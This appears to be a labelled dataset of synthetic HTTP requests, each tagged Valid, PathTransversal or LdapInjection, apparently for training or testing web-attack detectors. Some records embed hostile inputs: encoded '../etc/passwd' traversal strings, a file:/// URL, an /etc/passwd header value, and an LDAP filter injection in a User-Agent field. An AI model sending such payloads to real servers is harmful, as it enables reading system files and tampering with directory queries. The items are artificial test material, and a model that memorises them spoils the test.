If-Unmodified-Since: Fri, 15 Jul 05 08:51:52 GMT
If-Match: "PDBxk8x-Q1fv_hqIiQc"
If-None-Match: "Agyidh88I8p5.@xI"
If-Range: Wed, 16 Apr 08 15:04:58 CET
Max-Forwards: 64
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic MmZuTnpyejplTWlTY2NzZQ==
Authorization: Digest realm
Range: -17,22294-37803,139-
Referer: /c5ls/nltsi/psrs.wmn
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/3.9 (X11; U; Linux i386 1.7; ou-aT; rv:4.8.1) Gecko/44964691
UA-CPU: StrongARM
UA-Disp: 1514,212,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 5.9 www.eoawin.css, HTTP/2.3 184.209.128.254, FTP/2.9 www.ig2Ppai.css
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

eitTtxdesslsex=2c4b5l&samaily=7632669&SBnullXaintV31F=positionemochaLncd&saoea=953&o9tdRtoj=ops&P7GobjectT4=tbnullrBaelg7Anbodyiaccept&2eOE5=ieee|ihm

End - Id: 5025
Start - Id: 11954
class: Valid
GET /strsc9hDr0/4wlishsg2lyrwnxe/ehugkea/uor0edDatnrn.css?hrs0fcehcea2a=21234&ji=s0UXjB3&sa6henaEi5fCie=9738&iibbnice=p&apenc96eeyoLh=9577516&oTeineitw6an=fs+vbscriptrcp HTTP/1.0
Host: 136.6.86.42
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity, compress, gzip;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 206.94.92.96
Cookie: bae7emiea7aost1=Xee;runi=086;dorrioyEsmms=d~emochaa;nSjieO=l6V5e;lehAmt1otumtSgt=au;nehnnsasolthh=hns
Cookie2: $Version="640"
Date: Thu, 28 Jan 10 19:51:38 UTC
ETag: W/"h9hA8XvGYWZScKOEMx9"
Expect: 100-continue
From: RoReztii@imT2.gov
If-Modified-Since: Thu, 01 Oct 09 13:57:28 UTC
If-Unmodified-Since: Fri, 15 Oct 04 21:26:39 GMT
If-Match: "2n2_@0JX0ChPvuln"
If-None-Match: "_H@0IzdBhUtd95FZ."
If-Range: "Wyl8pYyo1RylgKcR"
Max-Forwards: 482
MIME-Version: 8.1
Pragma: alson8z=giyE3
Proxy-Authorization: Digest nc=DEd6BEef
Authorization: cwexd8 owwn=Eevlse
Range: 69-9009
Referer: http://ltle.it/atOht/ahi9e.sh
TE: gzip;q=0.5
Trailer: If-Modified-Since
User-Agent: tlddFiej (nnbj3GIO_F; c@u_j1)
UA-CPU: PowerPC
UA-Disp: 664,211,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 165x3870
Via: HTTP/5.0 36.191.63.162
Transfer-Encoding: deflate
Upgrade: Ctgnlx/6.7, sct/7.1, 1Se98/3.9, cbmeeR/3.3
Warning: 781 www.doaiO5.html:2 "eedAwnx0wtoeziimEee" "Wed, 27 Jun 07 16:44:22 UTC"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11954
Start - Id: 13729
class: Valid
GET /armb/ienoh/e6editilSA6ft1dwo.pl?eurwjsRaoeoyapl=3992746&nosolm=b-serlyIa%3Eina&pjRqwheao=chmy&ab2b=428&tnewlb=06pBUQoSR&inMupdateanqASGBtK=oOUTojf58&O8childJDnvOxN=n+tC1eip%3Fairnodeslms&RQi2=YhiRk&oieETE=2132&bist=tdl&gsigdtciAjedna=lm8m&EFeE7CVXY=mvloftromlhesihsd&dul3erteruraet6=x7gj&YhNKpAHN=E%7Cg%2F&pflL1K=nsoAgnay HTTP/1.1
Host: 57.150.206.111:80
Connection: eletc
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.7, iso-8859-9, x-mac-japanese;q=0.7, iso-2022-jp
Accept-Encoding: 
Accept-Language: axeysw-canrtb;q=0.2, yuI-dmhruoec;q=0.1, Tsshv-n, eeanOi-nyht, eka-eqn
Cache-Control: no-cache
Client-ip: 239.103.98.206
Cookie: ZgB58FGGSmochaperl9=0;kreadeo=yeeird8sbe;qTeoneva8eEh=eeizi@;0qmnRbhinhTq=p7syxterm
Cookie2: $Version="764"
Date: Fri, 20 May 05 08:04:31 UTC
ETag: "v5vYfaYzxGzuvJWQV"
Expect: R2ra
From: ep4c@gnrwie6l.biz
If-Modified-Since: Thu, 27 Jul 06 12:56:45 CET
If-Unmodified-Since: Sun, 01 Jan 06 03:48:40 GMT
If-Match: *
If-None-Match: "m75OlZ-GJDvpQ3SmeiC"
If-Range: Fri, 22 Apr 05 03:04:25 GMT
Max-Forwards: 0982
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sliaCear.fr/xlh1/4tmg/t5e1.mp3
Authorization: Digest nonce
Range: -4
Referer: /fian.mpeg
TE: trailers
Trailer: Pragma
User-Agent: SazeEfr4
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: 1.1 72.143.50.113
Transfer-Encoding: identity
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 799 www.lntleEda.png "elhhrlui" "Wed, 06 May 09 15:39:09 GMT"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 1852790108043394492
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13729
Start - Id: 28641
class: Valid
GET /8ZstyleBkIadminXd5Y6/axSagA@/mioc/8WabHioip/be.php4?yaei=wlszwftp&4ast6aoEolti=sf+&huszzOautoexecfY=nyL7b&hyi7ehroaoHo9eo=aQjZYey&pdeeu3h=53672&9snskagrz3lo2=s%3Eyararmperlo&cscriptyfUM0bEboot.iniV=341932&rOnUwnaaeehb=plinput5tTehetnh HTTP/1.1
Host: www.lieh2LjeiN.org:297
Connection: keep-alive
Accept: image/png;q=0.0, application/postscript
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip, compress, deflate
Accept-Language: uceernh-aennaH, 9a-Futr;q=0.3, l8malf-rin
Cache-Control: max-age=9623
Client-ip: 244.119.213.222
Cookie: e5oe84D=arsseciqiht;Ceshutdown25zcl=erslo%n4ewin ;tstdinhT0A8POyGQ=2mli
Cookie2: $Version="899"
Date: Thu, 14 Jan 10 18:37:36 GMT
ETag: "p4ZowzqOkri_rJ-VG0"
Expect: 100-continue
From: 6EaEszit@irni.st
If-Modified-Since: Thu, 24 Mar 05 04:51:57 UTC
If-Unmodified-Since: Sat, 26 Jan 08 05:09:17 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Dec 09 23:16:47 UTC
Max-Forwards: 7
MIME-Version: 8.8
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic cnRpdDN0ZTpycGlobmVo
Range: -5208,9131-01794,317-32381
Referer: http://www.yaxgt.st/zeOae5si/ofeges/n4te1.asp
TE: trailers
Trailer: Date
User-Agent: cceEyrxet
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9872x6402
Via: 5.7 www.u5cTn.css, 4.5 77.74.112.129
Transfer-Encoding: compress
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 629 69.63.243.157 "xtzo" "Tue, 07 Oct 08 08:00:58 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28641
Start - Id: 12414
class: Valid
GET /inputLofromjzBjPR4VinY/dGaV@bhG1/aEOAJlcbE6.gif? HTTP/1.1
Host: www.tiuohNo.gov
Connection: close
Accept: audio/basic;q=0.2, application/*;q=0.0, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: PizAOry-Ll51ne, m-isrme;q=0.8
Cache-Control: min-fresh=698
Client-ip: 254.164.211.20
Cookie: JcCF1=9;lrA2treeyrngto=s;zmedaimh8J=53574668;md=078;eJew=278
Cookie2: $Version="23"
Date: Thu, 01 May 08 05:17:21 UTC
ETag: W/"bwj.1qI6pKy-i7GX"
Expect: 100-continue
From: yiBv9i@mndhmfHee.st
If-Modified-Since: Fri, 27 Jul 07 10:17:04 CET
If-Unmodified-Since: Sat, 03 Apr 10 04:09:48 UTC
If-Match: *
If-None-Match: "P@OZ5pCL2w_7yl-j"
If-Range: "-NVXTMUdNaE4.Im2C_"
Max-Forwards: 15
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: NTLM ZHBscnRlZW9uZ3RLclNoaXNFMGxhZGVvanRodWVzZlRua3JlYw==
Range: 345-,-6,98-2183
Referer: /lrustoth/ksditls/yninr.swf
TE: trailers,chunked;q=0.6,deflate
Trailer: Host
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 3.2; he-h9; rv:8.8.0) Gecko/21236330
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7091x4892
Via: HTTP/6.6 97.106.241.240, 0.2 150.50.8.128
Transfer-Encoding: gzip
Upgrade: neuch/5.4
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 200058201
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12414
Start - Id: 17846
class: Valid
GET /irmtatos/sudRXAy.c@CYW/dXyp2gWvrvkRKyD/HMincludeA.xMvD8EK/FscfsgpdtonhheEl/4A0YTo4pGcDPY/0QzlF/GQH.bin?b4y=%3Fasysl%7EtYdgcl9s&lnudtcaic2=nFkSxVsN4&MatuhnSpt=6470&snek=ix0n8ezfose&lbifrfPruNawas=s%3EeNs&iQtw1he=syE&an=912&thoo=3laeodS5riinknlk1&jNwinntozQ3insert=u-d HTTP/1.1
Host: 168.240.162.92:77
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: aur='e'
Client-ip: 230.33.225.198
Cookie: 6YselectL-xVs_lw=b;x4mj4w8=o;1eivt9H6enooi=190966;deleteNRmsystemM7metaFkN=ascripti3;pa8.=ac
Cookie2: $Version="401"
Date: Sun, 01 Jun 08 02:40:26 GMT
ETag: "6iCjJLRY-a6HuJ-"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Tue, 17 Feb 04 03:11:22 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: "Gg@tbkqzOjXknJ4"
If-None-Match: *
If-Range: *
Max-Forwards: 812
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: http://www.9eEg.gov/Ubzdey/Teron.jsp
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: sshi (wV72OFhTg.; awBP.Kdb; fl@3-6WxYv)
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: HTTP/5.4 59.232.70.228, 0.0 98.41.122.43, iaror/6.4 www.Apaq.png
Transfer-Encoding: identity
Upgrade: Eetls/7.0, htl1/6.1, an0e/5.2
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17846
Start - Id: 16395
class: Valid
GET /DhlT5FS7GechoA8jCS/adrop4xYJ/WNstdinaadminGH5l/tD/aF22cSM/surntJugcPNTy/positionq8twUMo06Eyhp.nsf?Wnghf=cnidfiul2hhr&adminDExc@ESTr=015&dcweds1nob=633809&r9ns=tzp&irtirae=89481&m1detj34=u HTTP/1.0
Host: 180.214.34.237
Connection: keep-alive
Accept: image/png;q=0.8, application/*, image/*;q=0.5
Accept-Charset: windows-874;q=0.7, euc-kr, windows-1254;q=0.0, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: NrEtkas-tao;q=0.1
Cache-Control: max-age=9
Client-ip: 109.71.217.63
Cookie: aahklwotila=Om;ldiitrstdweo=xjwhn]bou;hrnrsYu=f;r;ku8ht4Imadte=i/ 5n;rpo0n=gdneloeypl1fLn;lw8anonAi=cnatieP
Cookie2: $Version="194"
Date: Thu, 08 Jan 04 24:06:22 GMT
ETag: W/"7XIkDKJsG4vQb_--"
Expect: 100-continue
From: piRire@gfja0tm2d.be
If-Modified-Since: Mon, 23 Jul 07 21:20:53 CET
If-Unmodified-Since: Sun, 17 Sep 06 02:29:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 607
MIME-Version: 2.3
Pragma: frw='OTr'
Proxy-Authorization: Digest opaque="e9apj"
Authorization: NTLM dGhJbnJQc2ZOd3N1YXRybWxmZXNhTmdobmNsaHR0ZWU1bmU5c2FvM3Fma2F5dw==
Range: 01-1534,0-2392,77-9065
Referer: /lEedxu.mpg
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.8 (compatible; eBrhOInb; Mac OS X; aodg5nhqg)
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: FTP/8.4 www.2nsngnti.htm, HTTP/8.2 www.tees.tiff
Transfer-Encoding: deflate
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 5481271353118244328
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16395
Start - Id: 46248
class: PathTransversal
GET /2DdoschgYdTx/r.j7FS/qGHmod4/oq/NKf3SfGqMeJb/danlOofCy.gif?tldlsae0xo=f%2B%5Bseeinsertsanlikenfk&ronvn=99087751&ejswau=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&Oigyb=8&TqMstdinlikepnwPlogzE=555933&eabefasHe9Traer=ieYtnh2Z+t&ne9axzRstbrci=sfnlatpc%3Bl&V-nweN9soF=yewleeknrxKss&imgBu3F422=65297038 HTTP/1.1
Host: 88.251.147.179
Connection: itascdl
Accept: application/zip, image/png
Accept-Charset: windows-874, ks_c_5601-1987, iso-8859-9;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 231.150.7.86
Cookie: 0eHbnE7o6=olphpreieimg
Cookie2: $Version="772"
Date: Fri, 07 Aug 09 18:48:55 CET
ETag: "N7Ppg6kTnN1vCFx0Lc"
Expect: salf=glfs9od
From: iervv@usohuics.gov
If-Modified-Since: Sat, 14 Mar 09 13:08:23 GMT
If-Unmodified-Since: Sun, 09 Aug 09 21:45:46 CET
If-Match: *
If-None-Match: "QeK9EsS8kgnHixgR"
If-Range: "QpC6NCb43Hnxt7j3"
Max-Forwards: 4037
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Basic dG9tYzphaG52
Range: 5263-
Referer: http://www.khtYAq.org/afaea.bin
TE: deflate;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (Windows; U; Win98 8.6; wd-dm; rv:8.0.9) Gecko/83091177
UA-CPU: 68000
UA-Disp: 601,9134,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0134x6320
Via: elOsmt/0.5 www.tdun7i.js:3
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46248
Start - Id: 37356
class: LdapInjection
GET /n2skSfeM1k/qaBGs/o.bwI7Kr-3f/ap@KjZNYDUE_node/NXPy5e-vQ.png?locationJVbvo76uidzf=55690&dechodeleteW.5BfP0http=%5B5Br&c7n=rsOwLlLw&IQTBLMhtaccesghhvW=oft&abrarw=seithsthcnslsmD5st&deOu59cmdZA4=nxw6qUU&me9020i6TputoB=3782077&iolarg=054463&1yninuoes=6&ebt5hw8atmlowwe=slnC4op&2ehtn7elta=g6%25daYlt&QrzE=%28o8%3Cr&nehnsOshicBrea=3iebiNrhHtevm7ti3o&eTl=tYZ9&eeur=310634 HTTP/1.1
Host: 211.162.90.239:1715
Connection: close
Accept: image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: et-8;q=0.7, p-zafcs1;q=0.5, s5dy-7Am;q=0.1, oa44O-orp1u09, miaE-rcf;q=0.3
Cache-Control: cao=kn
Client-ip: 76.89.173.110
Cookie: tdibuesamRo=n87;mc3r_1=0
Cookie2: $Version="077"
Date: Fri, 08 Jul 05 14:48:04 UTC
ETag: "X4db7ttjsKd2KS9Yf5"
Expect: 100-continue
If-Modified-Since: Sat, 15 May 04 24:46:18 GMT
If-Unmodified-Since: Thu, 09 Oct 08 14:28:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 557
MIME-Version: 8.7
Pragma: b4bujjta='td2eoz'
Proxy-Authorization: Basic dHRZZ2VyYTplc2ZpZQ==
Authorization: Basic cHBuZWRpZW86c2llbndz
Referer: /spaetr/ormpks/gp9nne.nsf
TE: trailers,trailers,gzip;q=0.8
Trailer: If-None-Match
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-Disp: 794,0889,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5121x090
Via: 2.5 www.teeo.png
Transfer-Encoding: compress
Upgrade: lytetD/7.1, a2i38/2.6
Warning: 959 www.0nrnnbes.css:737 "merriuI" 
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 854949447113384923
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37356
Start - Id: 24677
class: Valid
GET /zdafdfilatdkneoA7lr/nanstn/tbUfV/ayICAuPPATB/msOn0winnt@mcbr6log/sulelotnydrsz.htm?e3rwjnet19seae=jRd%3C&raMaane=1 HTTP/1.0
Host: www.efTihwDbl.com:89107
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: as2nyi-irxUtnns;q=0.1, eo-h;q=0.4
Cache-Control: kvm4ue=rc
Client-ip: 86.24.145.117
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="77"
Date: Sun, 27 May 07 01:30:26 GMT
ETag: W/"Nj29xQBF@ixp7BbKh"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Thu, 06 Aug 09 09:24:26 GMT
If-Unmodified-Since: Tue, 27 Apr 04 16:43:06 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Mar 06 10:55:38 CET
Max-Forwards: 33
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: td8an alxirMec=Lrinqcna
Authorization: Digest opaque="lczi"
Range: 1773-,147343-45947,-7279
Referer: /blqatin/hv8h51/shdpst/npgmbde.php4
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/4.9 (Windows; U; Win98 4.5; ni-R0; rv:2.6.7) Gecko/83622785
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.0 www.tytitee.shtml, 2.7 61.204.122.193, 6.1 www.edxtte.tiff
Transfer-Encoding: ndnmm; vhltHu=sodneylY
Upgrade: eew3/9.6
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24677
Start - Id: 17388
class: Valid
GET /AAjXOLxjGV0d/8T2ww-_aOor/aEKFR/7cEU03l.VmPFzEa/rmholopoNhIsoaare6rt/ienvgn.jpg?bRBNtofLr5q=oKv45.RW&dtelnetCwindow.openK.aLQTHl=aUDs80m&Hi=7ea+1andnxniKr1r&lc=453968893&ho=a9K&Jyswma=5587&ianw46rata=l HTTP/1.0
Host: www.grlmchlz.fr:80
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.8, iso-8859-6;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=6150
Client-ip: 55.91.205.173
Cookie: 7nm=asesre;wmiosrsiO=2644;zam9lek=nt;yTayen=7ur
Cookie2: $Version="80"
Date: Sun, 28 Oct 07 18:29:49 CET
ETag: "gPzho-dhAQlFxoSl-O90"
Expect: 100-continue
From: eoioeyi@guvv.be
If-Modified-Since: Mon, 02 Jul 07 24:25:17 UTC
If-Unmodified-Since: Sat, 15 Aug 09 02:43:35 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Sep 05 14:36:07 CET
Max-Forwards: 3
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bG9zbmU6dHB1aVNvNA==
Authorization: Basic ZXJ0ZGllV2Y6a3F6aA==
Range: 81-,2781-
Referer: http://oobf.com/fs3ao5k/ieyk/pfrli.css
TE: gzip,deflate;q=0.3,chunked
Trailer: If-Unmodified-Since
User-Agent: 9cEdtat1htyooiD
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9135x2545
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: deflate
Upgrade: idie/5.0, 2adte/6.6, cbhkaG/8.0
Warning: 274 108.86.172.150 "eennseA" 
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17388
Start - Id: 11984
class: Valid
GET /scnIAblpWBm2YtoF4ZqM/t8Gzpspam5/tq8JDm/iuzZsFGs5RI.kxmTJWI/oRf41CBeYJl.jsp? HTTP/1.0
Host: 132.0.204.19
Connection: close
Accept: video/*;q=0.3, image/png;q=0.6, text/html;q=0.3
Accept-Charset: iso-8859-8-i, x-mac-japanese;q=0.1, iso-8859-4, windows-1252;q=0.1, cp-950;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: ucBnxtt-it
Cache-Control: no-cache
Client-ip: 158.139.179.77
Cookie: VNV.fxvopenqxlike=919112;lxs3oL=wR;sOeu7QncBhI=6549050;tb3cis1etsevuse=10961
Cookie2: $Version="042"
Date: Thu, 30 Jun 05 01:21:58 GMT
ETag: "azk_rN20wtoPDiQA8P"
Expect: tucTehl
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Mon, 26 Jun 06 14:41:26 UTC
If-Unmodified-Since: Mon, 26 Sep 05 24:23:03 CET
If-Match: "xMW0st63L3-kMmVRZk"
If-None-Match: "PRGTjcPVB_fvrn5N3Vd2"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: uviq oqbaptww=h2ha
Range: 9-,78403-
Referer: /E2osS5h/wdaciata/nneeteti/taAsf.gz
TE: trailers,trailers,deflate
Trailer: User-Agent
User-Agent: tsE3 (c8fCn3-aW; g6RygP)
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: tooRs/9.1 89.79.20.2:7029, FTP/2.2 www.oieMetmi.shtml:0, 4.1 79.117.202.209
Transfer-Encoding: compress
Upgrade: ia1c/2.8, mur/1.2, susnSi/2.8, tteid/2.7, nnese/5.9
Warning: 288 117.157.147.158 "gu0mstndewn" "Wed, 10 Dec 08 23:14:10 CET"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11984
Start - Id: 32387
class: Valid
GET /p6dOY9l/GnodeUd87q.php4? HTTP/1.0
Host: 75.116.246.4:80
Connection: keep-alive
Accept: video/*;q=0.9, image/*, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: obyy-ihbhvi, 3ciiilE-iehejJv;q=0.8
Cache-Control: no-transform
Client-ip: 108.83.0.215
Cookie: OjdnaL3pil=6nPaMpgqEein;pzatS4aqnk6e=eiKrbintemb;siniNh=9020
Cookie2: $Version="57"
Date: Mon, 06 Jun 05 17:33:47 CET
ETag: W/"6oB9mofqMr5DqiT"
Expect: ajnerm=onntwu;abgnaaoI=itsi
From: itad@eosuny.org
If-Modified-Since: Thu, 04 Mar 04 08:33:22 CET
If-Unmodified-Since: Thu, 28 Dec 06 06:08:02 CET
If-Match: "CsRQHE7xDA.lvm1ouv2"
If-None-Match: "jsXCbpXs0iVNJ7qFS"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 5003
MIME-Version: 4.2
Pragma: ss0tnu='rl4eslR'
Proxy-Authorization: NTLM U2p0M29sOW5uaURuckZnaVQ3eXJ1bGVibzFidTJ0Njc=
Authorization: Digest qop=auth-int
Range: 36-,82952-6516,-8189
Referer: http://frow.com/aehaias.asmx
TE: gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/7.4 (compatible; Konqueror/2.9; Linux i386; ho5ax)
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color8
Via: 9.8 www.ste1.jpeg
Transfer-Encoding: deflate
Upgrade: ddG/8.0, tra/2.3
Warning: 620 www.jgtesooe.tiff "ezqhi" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 02894265118985687
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32387
Start - Id: 44734
class: PathTransversal
GET /eamg6n5rua4faxsgwo/nficaheaie/Ll/f1BL-EB-7y53L/dtqTfx88He-QU@T1@-/Kq@/x1and/uselect7Z9VzcPMWz9betweenc/positionechoSNWFnghbBlwM/h9jOST9zO/r3eNonsa5rohnNt.html?ljE=esga%2Bry7A&usipecaeargce=s2Bqmq&emdtmondrtvh=file%3A%2F%2F%2Fp%3A%2Floi%2Fgebc%2Focncsgic.xml&altrnand=+&qGpfB6V=rqhs+1%26mql%29t&ocKJ5XmochaXNnc=tda9&OUSlt3Dt7=%5Caenxstyleok&4P74objectxO=nkfttsuqrEsR&urIdon=aonp84noHkuvmn HTTP/1.1
Host: www.cmuaejic.com
Connection: undeeB
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, compress
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 67.198.26.106
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="66"
Date: Fri, 16 Apr 04 20:26:55 GMT
ETag: W/"XmSTqLIzU3VWhpFH07K"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sat, 21 Jan 06 13:28:47 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Dec 09 22:31:17 CET
Max-Forwards: 743
Pragma: aodh8tp=gtgsarh
Authorization: agoxte eiinhrh=oipd
Range: 218-,38304-
Referer: http://www.aigo7.gov/hbHnce/yeasRaae/seiur/sqFs6one/Ofhea4.sh
Trailer: TE
User-Agent: sUS5GCuD http://www.e3umuTr.de
UA-CPU: MIPS
UA-Color: color8
Via: FTP/0.1 www.odlMt.js, FTP/2.4 108.109.61.74, HTTP/0.6 5.58.30.194
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44734
Start - Id: 46441
class: PathTransversal
POST /MOQZzTJHwwgetGhttpsXCx.jsp? HTTP/1.0
Content-Length: 227
Content-Language: jae,i9hen
Content-Encoding: deflate
Content-Location: /slio4t.php
Content-MD5: bnI0dGV0YmFjc3V0dWZ2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 20:18:25 UTC
Last-Modified: Mon, 11 Jul 05 21:37:11 UTC
Host: 143.44.137.206:80
Connection: close
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity, identity;q=0.2, deflate
Accept-Language: /etc/passwd
Cache-Control: max-stale=3
Cookie2: $Version="643"
Date: Fri, 12 Jan 07 09:14:43 CET
Expect: te9bzU=vamasrr;Ndrl2s=amtw1ee
